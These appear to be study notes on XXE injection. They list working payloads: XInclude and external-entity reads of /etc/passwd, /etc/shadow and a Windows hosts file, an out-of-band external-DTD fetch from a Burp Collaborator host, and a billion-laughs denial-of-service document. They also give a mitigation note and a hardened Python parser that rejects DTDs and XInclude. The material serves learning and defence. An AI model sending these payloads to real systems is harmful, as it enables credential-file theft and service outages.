XXE

XInclude in XXE attack

```xml
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
```

```xml
<xi:include xmlns:xi="http://www.w3.org/2003/XInclude" parse="text"
href="file://../../../../../../../../Windows/System32/drivers/etc/hosts">
<xi:fallback>Oops!</xi:fallback>
</xi:include>
```
Mitigation: if possible, disable DTD processing (external entities) and entity expansion in the parser entirely. Add matching rules for the XML extensions that enable the same attack, such as XInclude and XOP.

Reference: What is XXE (XML external entity) injection? Tutorial & Examples | Web Security Academy

XXE payloads

Ping

```xml
<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://ccccccccccccc.burpcollaborator.net/x">
%ext;
]>
<r></r>
```

File disclosure

```xml
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
```

```xml
<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/shadow"> ]>
<userInfo>
<firstName>John</firstName>
<lastName>&ent;</lastName>
</userInfo>
```

Denial of Service

```xml
<?xml version="1.0" ?>
<!DOCTYPE lolz [<!ENTITY lol "lol"><!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<tag>&lol9;</tag>
```
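As an added example (not code from this page or from any of the resources it links), here is the mitigation from the XInclude section applied in practice: a hardened parse routine on Python's standard-library expat binding that refuses every DOCTYPE (which removes the external-entity, parameter-entity ping and entity-expansion payloads above in one stroke) and separately rejects elements in the XInclude namespace, which needs no DTD. The probe documents are constructed here, trimmed from the payloads above; the function names, XINCLUDE_NAMESPACES and PROBES are this example's own assumptions.

```python
import xml.parsers.expat
# Standard XInclude URI plus the non-standard 2003 variant used in the payload above.
XINCLUDE_NAMESPACES = {"http://www.w3.org/2001/XInclude", "http://www.w3.org/2003/XInclude"}

# Probe inputs (constructed, trimmed from the payloads above) plus one benign document.
PROBES = {
    "file": b"<?xml version='1.0'?><!DOCTYPE r [<!ENTITY e SYSTEM 'file:///etc/passwd'>]><r>&e;</r>",
    "lolz": b"<!DOCTYPE l [<!ENTITY a 'lol'><!ENTITY b '&a;&a;&a;'><!ENTITY c '&b;&b;&b;'>]><t>&c;</t>",
    "xinclude": b"<foo xmlns:xi='http://www.w3.org/2001/XInclude'><xi:include parse='text' href='file:///etc/passwd'/></foo>",
    "benign": b"<userInfo><firstName>John</firstName><lastName>Doe</lastName></userInfo>",
}

def parse_untrusted_xml(data: bytes) -> list[tuple[str, str]]:
    """Return (element, text) pairs in end-tag order; raise ValueError on any DTD or XInclude."""
    parser = xml.parsers.expat.ParserCreate(namespace_separator=" ")
    results: list[tuple[str, str]] = []
    stack: list[tuple[str, list[str]]] = []  # open elements and their text chunks

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        # No DOCTYPE means no entities at all: external, parameter or recursive.
        raise ValueError(f"DOCTYPE {name!r} rejected: DTDs are not accepted")

    def reject_external_entity(context, base, sysid, pubid):
        return 0  # defence in depth: never fetch; expat turns 0 into a parse error

    def start_element(name, attrs):
        uri, _, local = name.rpartition(" ")  # expat reports namespaced names as "uri local"
        if uri in XINCLUDE_NAMESPACES:  # XInclude needs no DTD, so it must be checked here
            raise ValueError(f"XInclude element <{local}> rejected")
        stack.append((local, []))

    def end_element(name):
        local, chunks = stack.pop()
        results.append((local, "".join(chunks).strip()))

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.ExternalEntityRefHandler = reject_external_entity
    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element
    parser.CharacterDataHandler = lambda text: stack[-1][1].append(text)
    parser.Parse(data, True)
    return results

def is_rejected(data: bytes) -> bool:
    """True if the hardened parser refuses the document (policy violation or malformed XML)."""
    try:
        parse_untrusted_xml(data)
        return False
    except (ValueError, xml.parsers.expat.ExpatError):
        return True
```

Rejecting at the DOCTYPE is the one configuration that needs no per-feature flag; if a parser must accept internal DTDs, the same handler hooks are where an entity count or expansion limit belongs.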

Resources

payloadbox/xxe-injection-payload-list: XML External Entity (XXE) Injection Payload List (GitHub)
XXE - XEE - XML External Entity (HackTricks)
DTD Cheat Sheet